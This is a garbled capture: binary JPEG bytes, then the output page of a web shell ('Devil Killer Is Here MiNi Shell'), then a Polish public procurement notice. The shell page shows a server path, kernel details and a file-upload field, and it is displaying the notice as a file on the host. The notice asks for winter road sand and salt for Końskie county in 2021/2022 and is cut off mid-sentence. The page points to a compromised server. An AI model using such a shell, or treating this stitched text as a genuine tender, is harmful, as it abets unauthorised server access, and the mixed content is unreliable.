JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211007/0022072001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Część 1- Dostawa piasku do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022<br/>Część 2- Dostawa soli do zimowego utrzymania dróg powiatowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Końskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291020126</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Staszica, 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Końskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 3750850, 41 3750852</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdpkonskie.zamowienia@vp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.konecki.wrota-swietokrzyskie.pl/zdp</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Część 1- Dostawa piasku do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022<br/>Część 2- Dostawa soli do zimowego utrzymania dróg powiatowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-334d6175-2732-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00220720</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004121/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa piasku do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022</p> <p class="mb-0">1.2.2 Dostawa soli do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między pomiędzy<br/>Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz<br/>przekazywanie informacji odbywa się wyłącznie elektronicznie za pośrednictwem dedykowanego<br/>formularza: „Formularz do komunikacji” dostępnego na ePUAP pod adresem: elektroniczna skrzynka<br/>podawcza ePUAP: /ZDPKonskie/SkrytkaESP lub poczty elektronicznej. e-mail:<br/>zdpkonskie.zamowienia@vp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). Sposób sporządzania i przekazywania<br/>dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od Wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca przetwarzania danych osobowych<br/>stanowi załącznik nr 5 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZ.3431.14.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>Część 1- Dostawa piasku do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022<br/>Szczegółowy opis przedmiotu zamówienia (Zadania) zawarty jest :<br/>Dla Części 1- w załączniku nr 1 i 1a do SIWZ I. Określenie dostaw.<br/>1. Zamówienie obejmuje sukcesywną dostawę piasku do zwalczania śliskości zimowej <br/> nawierzchni dróg ( ulic ) powiatowych w sezonie zimowym 2021/ 2022.<br/><br/>2. Miejsce dostawy : plac składowy w Obwodzie Drogowym w Końskich , ul. Warszawska 56<br/><br/>3. W oparciu o faktyczne ilości zużywanego piasku w poprzednich sezonach zimowych , <br/> Zamawiający przewiduje sukcesywną dostawę piasku w sezonie zimowym 2021/ 2022..<br/> w ilości 8000 ton. Wykonawca dostaw, przygotowany być musi do realizacji dostaw<br/> na wezwanie Zamawiającego . <br/><br/> <br/>4. Cena dostarczenia 1 tony piasku obejmować będzie :<br/> - pozyskanie – zakup piasku<br/> - koszt transportu do Obwodu Drogowego<br/> - rozładunek piasku na składowisku<br/> - zysk i ryzyko Wykonawcy<br/>5. Z uwagi na to , że Zamawiający nie jest w stanie przewidzieć warunków zimowych jakie <br/> będą występować w sezonie zimowym 2021/ 2022.., a od nich w głównej mierze <br/> uzależniona jest konieczność łagodzenia skutków śliskości występującej na <br/> nawierzchniach dróg ( ulic ) powiatowych , określone powyżej ilości przewidywanych <br/> dostaw w zależności od potrzeb mogą ulec zmniejszeniu . <br/><br/> Zamawiający informuje, że minimalna wielkość świadczenia dostaw objętych niniejszą <br/> umową wynosi 40% wartości wynagrodzenia<br/> <br/> Do wyliczenia należności stosowana będzie cena jednostkowa za dostarczenie 1 tony <br/> piasku . <br/><br/>6. Dostarczony piasek do zwalczania śliskości zimowej stosowany będzie :<br/>-	jako materiał do łagodzenia śliskości zimowej na nawierzchniach dróg ( ulic ) <br/>powiatowych – stosowany samodzielnie<br/>- do wykonania mieszanki piasku z solą <br/><br/>7 .Dostarczony piasek spełniać musi następujące wymagania :<br/>-	uziarnienie piasku nie powinno przekraczać 2 mm<br/>-	piasek nie może zawierać :<br/>- zanieczyszczeń ilastych, gliniastych lub luźnych otoczaków<br/>- zanieczyszczeń organicznych ( humusu, traw, korzeni, kamieni )<br/>- zawartość ziaren pylastych mniejszych od 0,075 mm nie może przekraczać 3 %<br/><br/>II. Warunki dostawy.<br/> <br/>1.	Wymienione wyżej ilości dostaw w poszczególnych terminach będą na bieżąco uzgadniane przez Kierownika Grupy Interwencyjnej z dostawcą a wynikać będą z faktycznych potrzeb uzależnionych od warunków zimowych.<br/><br/>2.	Dostarczone faktycznie ilości piasku potwierdzał będzie Kierownik Grupy Interwencyjnej, bądź upoważniony przez Kierownika pracownik Obwodu.<br/> Na koniec każdego okresu realizacji dostaw określonych w p-cie 3 części I opisu – <br/> spisany zostanie protokół w którym określone zostaną faktyczne ilości dostarczonego <br/> piasku, oraz okres dostaw. Protokół będzie podstawą do wystawienie przez wykonawcę <br/> faktury zamawiającemu.<br/><br/>3.	W przypadku , gdyby w ocenie ilości lub jakości dostarczonego piasku wystąpiły wątpliwości, odbierający dostawy będzie miał prawo do dokonania na koszt dostawcy zważenia lub określenia jakościowego w odpowiednim laboratorium wątpliwej partii dostawy. Gdyby faktyczna ilość piasku okazała się mniejsza od deklarowanej lub odbiegała od jakości materiału określonego w SST ,zamawiającemu przysługiwać będzie prawo zastosowania kar umownych określonych w załączonym wzorze umowy <br/><br/>4.	W rozliczeniach za faktycznie zrealizowane dostawy i odebrane ilości piasku stosowana będzie cena jednostkowa brutto która nie ulegnie zmianie w okresie trwania umowy.<br/>5.	Zamawiający zastrzega, że nie bierze odpowiedzialności w przypadku gdy źródło pozyskania piasku przez dostawcę nastąpi z naruszeniem obowiązujących przepisów ustawowych dotyczących pozyskania kopalin .<br/><br/>III. Warunki zapłaty<br/><br/>1.	Zamawiający zapewnia środki finansowe na zapłatę należności dostawcy za zrealizowane dostawy piasku na podstawie faktury VAT .<br/>2.	Warunki zapłaty , a także ewentualne kary zawarte zostały w załączonym do SIWZ wzorze umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14211100-4 - Piasek naturalny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">200 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Część 2- Dostawa soli do zimowego utrzymania dróg powiatowych na terenie Powiatu Koneckiego w sezonie 2021/ 2022 Sukcesywna dostawa w stanie luźnym soli kamiennej drogowej niezbrylającej w sezonie zimowym 2021/ 2022 w ilości 600 ton przeznaczonej do wykonania mieszanki piasku z solą służącej do zwalczania śliskości zimowej na nawierzchniach dróg (ulic). 1.	Zamówienie obejmuje sukcesywną dostawę w stanie luźnym soli kamiennej drogowej niezbrylającej w sezonie 2021/ 2022.w ilości ogólnej – 600 ton .<br/>Miejsce dostawy: plac składowy Obwodu Drogowego w Końskich, ul. Warszawska 56.<br/> Wykonawca dostaw soli zapewni rozładunek dostarczonej soli.<br/><br/>2.	Dostarczona sól drogowa niezbrylająca spełnić musi wymagania:<br/> skład chemiczny: NaCl – 90,0% min,<br/> SO4 -2 - 3,0% max,<br/> H2O - 3,0% max,<br/> części nierozpuszczalne w wodzie - 8,0% max<br/> antyzbrylacz K4Fe(CN)6 –20,0 ÷ 40,0 mg/kg,<br/> granulacja: ziarna powyżej 8 mm – 10% max,<br/> ziarna poniżej 1 mm - 60%max.<br/><br/>Wykonawca dostaw dla oferowanej soli posiadać musi:<br/>-	atest higieniczny,<br/>-	badania chemiczne lub podobny dokument wystawiony przez uprawniony podmiot potwierdzający wymagania dotyczące składu chemicznego i granulacji, oraz pozytywną opinię o przydatności soli do zwalczania śliskości zimowej na nawierzchniach dróg.<br/>-	wszystkie atesty i certyfikaty mówiące o przydatność soli do zwalczania śliskości zimowej winne być sporządzone w języku polskim . <br/>3.	Przewidywane dostawy w poszczególnych miesiącach sezonu zimowego 2021/2022 wynosić będą:<br/>- do dnia 5 listopada 2021 r. – 150 ton <br/>-	do dnia 20 grudnia 2021 r. – 150 ton,<br/>-	do dnia 24 stycznia 2022 r. – 150 ton,<br/>-	do dnia 20 lutego 2022 r. – 150 ton.<br/>Warunki i pozostałe ustalenia dotyczące realizacji dostaw soli zawiera załączona szczegółowa specyfikacja techniczna „na: zakup i dostawę soli kamiennej drogowej niezbrylającej w stanie luźnym”.<br/>4.	Zamawiający nie będąc w stanie przewidzieć warunków atmosferycznych w sezonie zimowym 2021/ 2022, od których uzależnione jest zużycie soli, zastrzega sobie możliwość zmniejszenia zakresu zamówienia dostaw . <br/><br/>Zamawiający informuje, że minimalna wielkość świadczenia dostaw objętych niniejszą umową wynosi 40% wartości wynagrodzenia<br/>5.	W przypadku , gdyby w ocenie ilości lub jakości dostarczonej soli wystąpiły wątpliwości, odbierający dostawy będzie miał prawo do dokonania na koszt dostawcy zważenia lub określenia jakościowego w odpowiednim laboratorium wątpliwej partii dostawy.<br/>Gdyby faktyczna ilość soli okazała się mniejsza od deklarowanej lud odbiegała od jakość materiału określonym w SST ,zamawiającemu przysługiwać będzie prawo zastosowania kar umownych .<br/>6.	Zamawiający - Zarząd Dróg Powiatowych w Końskich zapewnia środki finansowe i terminową zapłatę należności Wykonawcy za dostarczone ilości soli na podstawie faktury VAT </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34927100-2 - Sól drogowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">200 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>4.1.1 nie podlegają wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy.<br/>4.1.2 spełniają warunki udziału w postępowaniu w zakresie zdolności do występowania w obrocie<br/>gospodarczym.<br/>Zamawiający nie określa ww. warunku.<br/>4.1.3 spełniają warunki udziału w postępowaniu w zakresie uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa ww. warunku.<br/>4.1.4 spełniają warunki udziału w postępowaniu w zakresie sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie określa ww. warunku.<br/>4.1.5 spełniają warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej.<br/>Zamawiający nie określa szczegółowo w/ w warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>5.2.1 Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/><br/>5.2.2 Dokumentów dotyczących podmiotu udostępniającego zasoby, wymienionych w pkt 5.2.1 w celu wykazania braku istnienia wobec nich podstaw wykluczenia – o ile Wykonawca polega na zdolnościach lub sytuacji innego podmiotu.<br/>.<br/>5.3 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 5.2.1, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w zdaniu pierwszym, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>Dokumenty i oświadczenia o których mowa w niniejszym punkcie powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania 